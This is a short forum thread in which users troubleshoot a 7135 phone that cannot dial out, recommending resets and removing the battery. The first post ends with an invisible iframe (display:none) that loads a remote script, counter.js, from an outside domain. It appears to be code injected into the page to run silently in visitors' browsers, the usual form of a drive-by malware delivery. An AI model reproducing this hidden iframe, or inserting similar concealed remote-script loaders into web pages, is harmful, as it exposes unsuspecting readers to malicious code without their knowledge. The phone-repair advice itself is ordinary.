7135 Won't Dial Out

I lapsed into to this reoccuring problem of not being able to dial out. It's happened several times. The only time it started workign again is when I took it to the Verizon store and the upgraded the S/W. (which I don't think was the cause just a coincidence)

I've soft reset and hard reset the phone (and not loaded one piece of software) to at leasr get back to ground zero and and still nothing.

Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

After a backup, pull the battery out and stick it back in. That helps me...

It only happened once to me but the same fix applied. Soft and hard reset did nothing. Removed the battery then put it back, then all is well.

Same here, I had to remove the battery and then I could dial out. But the phone came back stupid, I had to do a Hotsync since everything was lost.
